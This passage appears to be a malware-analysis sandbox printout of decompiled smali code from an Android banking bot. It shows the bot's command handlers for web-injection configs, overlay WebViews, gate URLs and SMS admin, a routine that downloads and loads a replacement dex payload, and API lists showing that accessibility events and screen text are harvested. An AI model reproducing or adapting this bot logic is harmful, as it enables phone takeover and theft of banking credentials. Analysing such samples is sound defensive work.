                        301invoke-virtual {v4, v6}, Ljava/lang/String;->split(Ljava/lang/String;)[Ljava/lang/String;
                        302move-result-object v4
                        303const/4 v6, 0x1
                        305invoke-virtual {p0, p1, v3, v4, v6}, Lcom/lib;->writeWebInjConfig(Landroid/content/Context;Ljava/lang/String;[Ljava/lang/String;Z)Z
                        306move-result v3
                        307if-eqz v3, :cond_1a7
                        308const/4 v3, 0x3
                        310invoke-static {v3}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        311move-result-object v3
                        312goto/16 :goto_6a
                        313cond_1a7: const/4 v3, 0x2
                        315invoke-static {v3}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        316move-result-object v3
                        317goto/16 :goto_6a
                        318cond_1ae: const/4 v3, 0x2
                        320invoke-static {v3}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        321move-result-object v3
                        322goto/16 :goto_6a
                        323pswitch_1b5:
                        324const-string v3, "webInjPrefs"
                        326sget-object v4, Lcom/lib;->STRINGS_DATA:Ljava/lang/String;
                        328invoke-virtual {v6, v4}, Lorg/json/JSONObject;->getJSONObject(Ljava/lang/String;)Lorg/json/JSONObject;
                        329move-result-object v4
                        331sget-object v7, Lcom/lib;->STRINGS_PACKAGE:Ljava/lang/String;
                        333invoke-virtual {v4, v7}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
                        334move-result-object v4
                        336sget-object v7, Lcom/lib;->STRINGS_DATA:Ljava/lang/String;
                        338invoke-virtual {v6, v7}, Lorg/json/JSONObject;->getJSONObject(Ljava/lang/String;)Lorg/json/JSONObject;
                        339move-result-object v6
                        341sget-object v7, Lcom/lib;->STRINGS_VALUE:Ljava/lang/String;
                        343invoke-virtual {v6, v7}, Lorg/json/JSONObject;->getBoolean(Ljava/lang/String;)Z
                        344move-result v6
                        346invoke-virtual {p0, p1, v3, v4, v6}, Lcom/lib;->updateWebInjConfig(Landroid/content/Context;Ljava/lang/String;Ljava/lang/String;Z)Z
                        347move-result v3
                        348if-eqz v3, :cond_1dc
                        349const/4 v3, 0x3
                        351invoke-static {v3}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        352move-result-object v3
                        353goto/16 :goto_6a
                        354cond_1dc: const/4 v3, 0x2
                        356invoke-static {v3}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        357move-result-object v3
                        358goto/16 :goto_6a
                        359pswitch_1e3:
                        360sget-object v4, Lcom/lib;->STRINGS_ACTION:Ljava/lang/String;
                        362invoke-virtual {v6, v4}, Lorg/json/JSONObject;->getInt(Ljava/lang/String;)I
                        363move-result v4
                        364packed-switch v4, :pswitch_data_34c
                        365goto/16 :goto_6a
                        366pswitch_1ee:
                        367const-string v3, "pinnedPrefs"
                        369invoke-virtual {p0, p1, v3}, Lcom/lib;->cleanNeedPinned(Landroid/content/Context;Ljava/lang/String;)Z
                        371sget-object v3, Lcom/lib;->pinnedHintView:Landroid/webkit/WebView;
                        373invoke-virtual {p0, p1, v3}, Lcom/lib;->removePinnned(Landroid/content/Context;Landroid/webkit/WebView;)V
                        374const/4 v3, 0x3
                        376invoke-static {v3}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        377move-result-object v3
                        378goto/16 :goto_6a
                        379pswitch_1ff:
                        380const-string v3, "pinnedPrefs"
                        382invoke-virtual {p0, p1, v3}, Lcom/lib;->cleanNeedPinned(Landroid/content/Context;Ljava/lang/String;)Z
                        384const-string v3, "pinnedPrefs"
                        386sget-object v4, Lcom/lib;->STRINGS_DATA:Ljava/lang/String;
                        388invoke-virtual {v6, v4}, Lorg/json/JSONObject;->getJSONObject(Ljava/lang/String;)Lorg/json/JSONObject;
                        389move-result-object v4
                        391sget-object v7, Lcom/lib;->STRINGS_HTML:Ljava/lang/String;
                        393invoke-virtual {v4, v7}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
                        394move-result-object v4
                        396sget-object v7, Lcom/lib;->STRINGS_DATA:Ljava/lang/String;
                        398invoke-virtual {v6, v7}, Lorg/json/JSONObject;->getJSONObject(Ljava/lang/String;)Lorg/json/JSONObject;
                        399move-result-object v7
                        401sget-object v8, Lcom/lib;->STRINGS_BG:Ljava/lang/String;
                        403invoke-virtual {v7, v8}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
                        404move-result-object v7
                        406invoke-virtual {p0, p1, v3, v4, v7}, Lcom/lib;->setNeedPinned(Landroid/content/Context;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;)Z
                        408sget-object v3, Lcom/lib;->STRINGS_DATA:Ljava/lang/String;
                        410invoke-virtual {v6, v3}, Lorg/json/JSONObject;->getJSONObject(Ljava/lang/String;)Lorg/json/JSONObject;
                        411move-result-object v3
                        413sget-object v4, Lcom/lib;->STRINGS_HTML:Ljava/lang/String;
                        415invoke-virtual {v3, v4}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
                        416move-result-object v3
                        418sget-object v4, Lcom/lib;->STRINGS_DATA:Ljava/lang/String;
                        420invoke-virtual {v6, v4}, Lorg/json/JSONObject;->getJSONObject(Ljava/lang/String;)Lorg/json/JSONObject;
                        421move-result-object v4
                        423sget-object v6, Lcom/lib;->STRINGS_BG:Ljava/lang/String;
                        425invoke-virtual {v4, v6}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
                        426move-result-object v4
                        428invoke-virtual {p0, p1, v3, v4}, Lcom/lib;->showPinnned(Landroid/content/Context;Ljava/lang/String;Ljava/lang/String;)Z
                        429move-result v3
                        430if-eqz v3, :cond_246
                        431const/4 v3, 0x3
                        433invoke-static {v3}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        434move-result-object v3
                        435goto/16 :goto_6a
                        436cond_246: const/4 v3, 0x2
                        438invoke-static {v3}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        439move-result-object v3
                        440goto/16 :goto_6a
                        441pswitch_24d:
                        442sget-object v4, Lcom/lib;->STRINGS_ACTION:Ljava/lang/String;
                        444invoke-virtual {v6, v4}, Lorg/json/JSONObject;->getInt(Ljava/lang/String;)I
                        445move-result v4
                        446packed-switch v4, :pswitch_data_354
                        447goto/16 :goto_6a
                        448pswitch_258:
                        449const-string v3, "gateUrlsPrefs"
                        451sget-object v4, Lcom/lib;->STRINGS_DATA:Ljava/lang/String;
                        453invoke-virtual {v6, v4}, Lorg/json/JSONObject;->getJSONObject(Ljava/lang/String;)Lorg/json/JSONObject;
                        454move-result-object v4
                        456sget-object v6, Lcom/lib;->STRINGS_URLS:Ljava/lang/String;
                        458invoke-virtual {v4, v6}, Lorg/json/JSONObject;->getJSONArray(Ljava/lang/String;)Lorg/json/JSONArray;
                        459move-result-object v4
                        461invoke-virtual {p0, v4}, Lcom/lib;->jsonArrayToStringArray(Lorg/json/JSONArray;)[Ljava/lang/String;
                        462move-result-object v4
                        463const/4 v6, 0x1
                        465invoke-virtual {p0, p1, v3, v4, v6}, Lcom/lib;->writeGateUrls(Landroid/content/Context;Ljava/lang/String;[Ljava/lang/String;Z)Z
                        466move-result v3
                        467if-eqz v3, :cond_278
                        468const/4 v3, 0x3
                        470invoke-static {v3}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        471move-result-object v3
                        472goto/16 :goto_6a
                        473cond_278:
                        474iget-object v3, p0, Lcom/lib;->urlsFallback:Ljava/lang/String;
                        476invoke-virtual {p0, p1, v3}, Lcom/lib;->loadUrls(Landroid/content/Context;Ljava/lang/String;)V
                        477const/4 v3, 0x2
                        479invoke-static {v3}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        480move-result-object v3
                        481goto/16 :goto_6a
                        482pswitch_284:
                        483sget-object v4, Lcom/lib;->STRINGS_ACTION:Ljava/lang/String;
                        485invoke-virtual {v6, v4}, Lorg/json/JSONObject;->getInt(Ljava/lang/String;)I
                        486move-result v4
                        487packed-switch v4, :pswitch_data_35a
                        488goto/16 :goto_6a
                        489pswitch_28f:
                        490invoke-virtual {p0, p1}, Lcom/lib;->stopSmsAdmin(Landroid/content/Context;)Z
                        491move-result v3
                        492if-eqz v3, :cond_2b0
                        493const/4 v3, 0x3
                        495invoke-static {v3}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        496move-result-object v3
                        497goto/16 :goto_6a
                        498pswitch_29c:
                        499invoke-virtual {p0, p1}, Lcom/lib;->startSmsAdmin(Landroid/content/Context;)Z
                        500move-result v3
                        501if-eqz v3, :cond_2a9
                        502const/4 v3, 0x3
                        504invoke-static {v3}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        505move-result-object v3
                        506goto/16 :goto_6a
                        507cond_2a9: const/4 v3, 0x2
                        509invoke-static {v3}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        510move-result-object v3
                        511goto/16 :goto_6a
                        512cond_2b0: const/4 v3, 0x2
                        514invoke-static {v3}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        515try_end_2b4: move-result-object v3
                        516goto/16 :goto_6a
                        517catch_2b7: move-exception v0
                        519const-string v3, "updateGateUrls"
                        521invoke-virtual {v1, v3}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        522move-result v3
                        523if-eqz v3, :cond_2dd
                        524new-instance v3, Ljava/lang/StringBuilder;
                        526invoke-direct {v3}, Ljava/lang/StringBuilder;-><init>()V
                        528const-string v4, "[func] [parseCommand] Exception! [loadUrls] urlsFallback: "
                        530invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        531move-result-object v3
                        533iget-object v4, p0, Lcom/lib;->urlsFallback:Ljava/lang/String;
                        535invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        536move-result-object v3
                        538invoke-virtual {v3}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        539move-result-object v3
                        541invoke-virtual {p0, v3}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        543iget-object v3, p0, Lcom/lib;->urlsFallback:Ljava/lang/String;
                        545invoke-virtual {p0, p1, v3}, Lcom/lib;->loadUrls(Landroid/content/Context;Ljava/lang/String;)V
                        546cond_2dd: new-instance v3, Ljava/lang/StringBuilder;
                        548invoke-direct {v3}, Ljava/lang/StringBuilder;-><init>()V
                        550const-string v4, "[func] [parseCommand] command "
                        552invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        553move-result-object v3
                        555invoke-virtual {v3, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        556move-result-object v3
                        558const-string v4, " T: "
                        560invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        561move-result-object v3
                        563invoke-virtual {v3, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        564move-result-object v0
                        566invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        567move-result-object v0
                        569invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        570cond_2fd: if-eqz v2, :cond_306
                        572invoke-virtual {v5}, Lorg/json/JSONObject;->toString()Ljava/lang/String;
                        573move-result-object v0
                        575invoke-virtual {p0, p1, v1, v0}, Lcom/lib;->sendLog(Landroid/content/Context;Ljava/lang/String;Ljava/lang/String;)Z
                        576cond_306: return v2
                        577nop
                        Cross References
                        APIs
                        • java.util.concurrent.Semaphore.acquire
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • org.json.JSONObject.toString
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.util.concurrent.Semaphore.acquire
                        • java.util.concurrent.Semaphore.acquire
                        • java.util.concurrent.Semaphore.acquire
                        • java.util.concurrent.Semaphore.acquire
                        • java.util.concurrent.Semaphore.acquire
                        • java.util.concurrent.Semaphore.acquire
                        • java.util.concurrent.Semaphore.acquire
                        • org.json.JSONObject.getString
                        • org.json.JSONObject.getString
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • android.content.Context.getDir
                        • java.io.File.<init>
                        • java.io.File.exists
                        • java.io.File.delete
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.Integer.valueOf
                        • android.app.Service.stopSelf
                        • java.lang.Thread.interrupt
                        • java.lang.Thread.interrupt
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.Throwable.printStackTrace
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.Throwable.getStackTrace
                        • java.lang.StackTraceElement.getLineNumber
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        Strings
                        • [bot] [func] [parseLib] lib:
                        • [bot] [func] [parseLib] startUpdate
                        • [bot] [func] [parseLib] threads stopped
                        • [bot] [func] [parseLib] mutex\'s done
                        • [bot] [func] [parseLib] libUrl:
                        • dex
                        • [bot] [func] [parseLib] delRez:
                        • [bot] [func] [parseLib] stop service
                        • [bot] [func] [parseLib] something lockin update: isA11yInjected is
                        • webInjCurrentApp is
                        • [bot] [func] [parseLib] T:
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v0, 0x1
                        2const/4 v1, 0x0
                        3sput-boolean v0, Lcom/lib;->isLibUpdating:Z
                        4try_start_4:
                        5sget-object v2, Lcom/lib;->libMutex:Ljava/util/concurrent/Semaphore;
                        7invoke-virtual {v2}, Ljava/util/concurrent/Semaphore;->acquire()V
                        8try_start_9: new-instance v2, Ljava/lang/StringBuilder;
                        10invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        12const-string v3, "[bot] [func] [parseLib] lib:"
                        14invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        15move-result-object v2
                        17invoke-virtual {p2}, Lorg/json/JSONObject;->toString()Ljava/lang/String;
                        18move-result-object v3
                        20invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        21move-result-object v2
                        23invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        24move-result-object v2
                        26invoke-virtual {p0, v2}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        27sget-boolean v2, Lcom/lib;->isA11yInjected:Z
                        28if-nez v2, :cond_102
                        30iget-object v2, p0, Lcom/lib;->webInjCurrentApp:Ljava/lang/String;
                        31if-nez v2, :cond_102
                        33const-string v2, "[bot] [func] [parseLib] startUpdate"
                        35invoke-virtual {p0, v2}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        37const-string v2, "[bot] [func] [parseLib] threads stopped"
                        39invoke-virtual {p0, v2}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        41sget-object v2, Lcom/lib;->botUidMutex:Ljava/util/concurrent/Semaphore;
                        43invoke-virtual {v2}, Ljava/util/concurrent/Semaphore;->acquire()V
                        45sget-object v2, Lcom/lib;->webMutex:Ljava/util/concurrent/Semaphore;
                        47invoke-virtual {v2}, Ljava/util/concurrent/Semaphore;->acquire()V
                        49sget-object v2, Lcom/lib;->aSniffMutex:Ljava/util/concurrent/Semaphore;
                        51invoke-virtual {v2}, Ljava/util/concurrent/Semaphore;->acquire()V
                        53sget-object v2, Lcom/lib;->pinnedMutex:Ljava/util/concurrent/Semaphore;
                        55invoke-virtual {v2}, Ljava/util/concurrent/Semaphore;->acquire()V
                        57sget-object v2, Lcom/lib;->smsAdminMutex:Ljava/util/concurrent/Semaphore;
                        59invoke-virtual {v2}, Ljava/util/concurrent/Semaphore;->acquire()V
                        61sget-object v2, Lcom/lib;->gateUrlsMutex:Ljava/util/concurrent/Semaphore;
                        63invoke-virtual {v2}, Ljava/util/concurrent/Semaphore;->acquire()V
                        65sget-object v2, Lcom/lib;->configMutex:Ljava/util/concurrent/Semaphore;
                        67invoke-virtual {v2}, Ljava/util/concurrent/Semaphore;->acquire()V
                        69const-string v2, "[bot] [func] [parseLib] mutex\'s done"
                        71invoke-virtual {p0, v2}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        73sget-object v2, Lcom/lib;->STRINGS_HASH:Ljava/lang/String;
                        75invoke-virtual {p2, v2}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
                        76move-result-object v2
                        78invoke-virtual {p0, v2}, Lcom/lib;->makeLibUrl(Ljava/lang/String;)Ljava/lang/String;
                        79move-result-object v2
                        81sget-object v3, Lcom/lib;->STRINGS_PASSWD:Ljava/lang/String;
                        83invoke-virtual {p2, v3}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
                        84move-result-object v3
                        85new-instance v4, Ljava/lang/StringBuilder;
                        87invoke-direct {v4}, Ljava/lang/StringBuilder;-><init>()V
                        89const-string v5, "[bot] [func] [parseLib] libUrl: "
                        91invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        92move-result-object v4
                        94invoke-virtual {v4, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        95move-result-object v4
                        97invoke-virtual {v4}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        98move-result-object v4
                        100invoke-virtual {p0, v4}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        102invoke-virtual {p0}, Lcom/lib;->genLibUpdateName()Ljava/lang/String;
                        103move-result-object v4
                        104new-instance v5, Ljava/io/File;
                        106const-string v6, "dex"
                        107const/4 v7, 0x0
                        109invoke-virtual {p1, v6, v7}, Landroid/content/Context;->getDir(Ljava/lang/String;I)Ljava/io/File;
                        110move-result-object v6
                        112invoke-direct {v5, v6, v4}, Ljava/io/File;-><init>(Ljava/io/File;Ljava/lang/String;)V
                        114invoke-virtual {v5}, Ljava/io/File;->exists()Z
                        115move-result v4
                        116if-eqz v4, :cond_b3
                        118invoke-virtual {v5}, Ljava/io/File;->delete()Z
                        119move-result v4
                        120new-instance v6, Ljava/lang/StringBuilder;
                        122invoke-direct {v6}, Ljava/lang/StringBuilder;-><init>()V
                        124const-string v7, "[bot] [func] [parseLib] delRez: "
                        126invoke-virtual {v6, v7}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        127move-result-object v6
                        129invoke-virtual {v6, v4}, Ljava/lang/StringBuilder;->append(Z)Ljava/lang/StringBuilder;
                        130move-result-object v4
                        132invoke-virtual {v4}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        133move-result-object v4
                        135invoke-virtual {p0, v4}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        136cond_b3: const/16 v4, 0xa
                        138invoke-static {v4}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        139move-result-object v4
                        141invoke-virtual {p0, v2, v5, v3, v4}, Lcom/lib;->downloadFile(Ljava/lang/String;Ljava/io/File;Ljava/lang/String;Ljava/lang/Integer;)Z
                        142move-result v2
                        143if-eqz v2, :cond_1a7
                        145const-string v2, "[bot] [func] [parseLib] stop service"
                        147invoke-virtual {p0, v2}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        148check-cast p1, Landroid/app/Service;
                        150invoke-virtual {p1}, Landroid/app/Service;->stopSelf()V
                        152iget-object v2, p0, Lcom/lib;->permissionsThread:Ljava/lang/Thread;
                        154invoke-virtual {v2}, Ljava/lang/Thread;->interrupt()V
                        156iget-object v2, p0, Lcom/lib;->networkThread:Ljava/lang/Thread;
                        158invoke-virtual {v2}, Ljava/lang/Thread;->interrupt()V
                        159goto_d3: move v1, v0
                        160goto_d4: if-nez v1, :cond_101
                        161try_start_d6:
                        162sget-object v0, Lcom/lib;->botUidMutex:Ljava/util/concurrent/Semaphore;
                        164invoke-virtual {v0}, Ljava/util/concurrent/Semaphore;->release()V
                        166sget-object v0, Lcom/lib;->webMutex:Ljava/util/concurrent/Semaphore;
                        168invoke-virtual {v0}, Ljava/util/concurrent/Semaphore;->release()V
                        170sget-object v0, Lcom/lib;->aSniffMutex:Ljava/util/concurrent/Semaphore;
                        172invoke-virtual {v0}, Ljava/util/concurrent/Semaphore;->release()V
                        174sget-object v0, Lcom/lib;->pinnedMutex:Ljava/util/concurrent/Semaphore;
                        176invoke-virtual {v0}, Ljava/util/concurrent/Semaphore;->release()V
                        178sget-object v0, Lcom/lib;->smsAdminMutex:Ljava/util/concurrent/Semaphore;
                        180invoke-virtual {v0}, Ljava/util/concurrent/Semaphore;->release()V
                        182sget-object v0, Lcom/lib;->gateUrlsMutex:Ljava/util/concurrent/Semaphore;
                        184invoke-virtual {v0}, Ljava/util/concurrent/Semaphore;->release()V
                        186sget-object v0, Lcom/lib;->configMutex:Ljava/util/concurrent/Semaphore;
                        188invoke-virtual {v0}, Ljava/util/concurrent/Semaphore;->release()V
                        190sget-object v0, Lcom/lib;->libMutex:Ljava/util/concurrent/Semaphore;
                        192invoke-virtual {v0}, Ljava/util/concurrent/Semaphore;->release()V
                        193const/4 v0, 0x0
                        194sput-boolean v0, Lcom/lib;->isLibUpdating:Z
                        195cond_101: return v1
                        196try_start_102: new-instance v0, Ljava/lang/StringBuilder;
                        198invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        200const-string v2, "[bot] [func] [parseLib] something lockin update: isA11yInjected is "
                        202invoke-virtual {v0, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        203move-result-object v0
                        204sget-boolean v2, Lcom/lib;->isA11yInjected:Z
                        206invoke-virtual {v0, v2}, Ljava/lang/StringBuilder;->append(Z)Ljava/lang/StringBuilder;
                        207move-result-object v0
                        209const-string v2, " webInjCurrentApp is "
                        211invoke-virtual {v0, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        212move-result-object v0
                        214iget-object v2, p0, Lcom/lib;->webInjCurrentApp:Ljava/lang/String;
                        216invoke-virtual {v0, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        217move-result-object v0
                        219invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        220move-result-object v0
                        222invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        223try_end_126: goto/16 :goto_d4
                        224catch_127: move-exception v0
                        225try_start_128:
                        226invoke-virtual {v0}, Ljava/lang/Throwable;->printStackTrace()V
                        227new-instance v2, Ljava/lang/StringBuilder;
                        229invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        231const-string v3, "[bot] [func] [parseLib] T: "
                        233invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        234move-result-object v2
                        236invoke-virtual {v0}, Ljava/lang/Throwable;->getStackTrace()[Ljava/lang/StackTraceElement;
                        237move-result-object v0
                        238const/4 v3, 0x0
                        239aget-object v0, v0, v3
                        241invoke-virtual {v0}, Ljava/lang/StackTraceElement;->getLineNumber()I
                        242move-result v0
                        244invoke-virtual {v2, v0}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
                        245move-result-object v0
                        247invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        248move-result-object v0
                        250invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        251try_start_14c:
                        252sget-object v0, Lcom/lib;->botUidMutex:Ljava/util/concurrent/Semaphore;
                        254invoke-virtual {v0}, Ljava/util/concurrent/Semaphore;->release()V
                        256sget-object v0, Lcom/lib;->webMutex:Ljava/util/concurrent/Semaphore;
                        258invoke-virtual {v0}, Ljava/util/concurrent/Semaphore;->release()V
                        260sget-object v0, Lcom/lib;->aSniffMutex:Ljava/util/concurrent/Semaphore;
                        262invoke-virtual {v0}, Ljava/util/concurrent/Semaphore;->release()V
                        264sget-object v0, Lcom/lib;->pinnedMutex:Ljava/util/concurrent/Semaphore;
                        266invoke-virtual {v0}, Ljava/util/concurrent/Semaphore;->release()V
                        268sget-object v0, Lcom/lib;->smsAdminMutex:Ljava/util/concurrent/Semaphore;
                        270invoke-virtual {v0}, Ljava/util/concurrent/Semaphore;->release()V
                        272sget-object v0, Lcom/lib;->gateUrlsMutex:Ljava/util/concurrent/Semaphore;
                        274invoke-virtual {v0}, Ljava/util/concurrent/Semaphore;->release()V
                        276sget-object v0, Lcom/lib;->configMutex:Ljava/util/concurrent/Semaphore;
                        278invoke-virtual {v0}, Ljava/util/concurrent/Semaphore;->release()V
                        280sget-object v0, Lcom/lib;->libMutex:Ljava/util/concurrent/Semaphore;
                        282invoke-virtual {v0}, Ljava/util/concurrent/Semaphore;->release()V
                        283const/4 v0, 0x0
                        284sput-boolean v0, Lcom/lib;->isLibUpdating:Z
                        285goto/16 :goto_101
                        286catch_178: move-exception v0
                        287goto/16 :goto_101
                        288catchall_17a: move-exception v0
                        290sget-object v2, Lcom/lib;->botUidMutex:Ljava/util/concurrent/Semaphore;
                        292invoke-virtual {v2}, Ljava/util/concurrent/Semaphore;->release()V
                        294sget-object v2, Lcom/lib;->webMutex:Ljava/util/concurrent/Semaphore;
                        296invoke-virtual {v2}, Ljava/util/concurrent/Semaphore;->release()V
                        298sget-object v2, Lcom/lib;->aSniffMutex:Ljava/util/concurrent/Semaphore;
                        300invoke-virtual {v2}, Ljava/util/concurrent/Semaphore;->release()V
                        302sget-object v2, Lcom/lib;->pinnedMutex:Ljava/util/concurrent/Semaphore;
                        304invoke-virtual {v2}, Ljava/util/concurrent/Semaphore;->release()V
                        306sget-object v2, Lcom/lib;->smsAdminMutex:Ljava/util/concurrent/Semaphore;
                        308invoke-virtual {v2}, Ljava/util/concurrent/Semaphore;->release()V
                        310sget-object v2, Lcom/lib;->gateUrlsMutex:Ljava/util/concurrent/Semaphore;
                        312invoke-virtual {v2}, Ljava/util/concurrent/Semaphore;->release()V
                        314sget-object v2, Lcom/lib;->configMutex:Ljava/util/concurrent/Semaphore;
                        316invoke-virtual {v2}, Ljava/util/concurrent/Semaphore;->release()V
                        318sget-object v2, Lcom/lib;->libMutex:Ljava/util/concurrent/Semaphore;
                        320invoke-virtual {v2}, Ljava/util/concurrent/Semaphore;->release()V
                        321const/4 v2, 0x0
                        322sput-boolean v2, Lcom/lib;->isLibUpdating:Z
                        323throw v0
                        324try_end_1a7: move v0, v1
                        325goto/16 :goto_d3
                        Cross References
                        APIs
                        • org.json.JSONObject.<init>
                        • org.json.JSONObject.<init>
                        • android.view.accessibility.AccessibilityEvent.getEventType
                        • android.view.accessibility.AccessibilityEvent.eventTypeToString
                        • org.json.JSONObject.put
                        • android.view.accessibility.AccessibilityEvent.getClassName
                        • org.json.JSONObject.put
                        • android.view.accessibility.AccessibilityEvent.getEventTime
                        • org.json.JSONObject.put
                        • android.view.accessibility.AccessibilityEvent.getText
                        • android.view.accessibility.AccessibilityEvent.getText
                        • java.lang.Object.toString
                        • org.json.JSONObject.put
                        • android.view.accessibility.AccessibilityEvent.getSource
                        • android.view.accessibility.AccessibilityNodeInfo.refresh
                        • android.view.accessibility.AccessibilityNodeInfo.getClassName
                        • org.json.JSONObject.put
                        • android.view.accessibility.AccessibilityNodeInfo.getText
                        • android.view.accessibility.AccessibilityNodeInfo.getText
                        • java.lang.CharSequence.toString
                        • org.json.JSONObject.put
                        • android.view.accessibility.AccessibilityNodeInfo.getContentDescription
                        • android.view.accessibility.AccessibilityNodeInfo.getContentDescription
                        • java.lang.CharSequence.toString
                        • org.json.JSONObject.put
                        • android.view.accessibility.AccessibilityNodeInfo.getViewIdResourceName
                        • org.json.JSONObject.put
                        • android.view.accessibility.AccessibilityNodeInfo.isEnabled
                        • org.json.JSONObject.put
                        • android.view.accessibility.AccessibilityNodeInfo.isClickable
                        • org.json.JSONObject.put
                        • android.view.accessibility.AccessibilityNodeInfo.isCheckable
                        • org.json.JSONObject.put
                        • android.view.accessibility.AccessibilityNodeInfo.isChecked
                        • org.json.JSONObject.put
                        • android.view.accessibility.AccessibilityNodeInfo.isVisibleToUser
                        • org.json.JSONObject.put
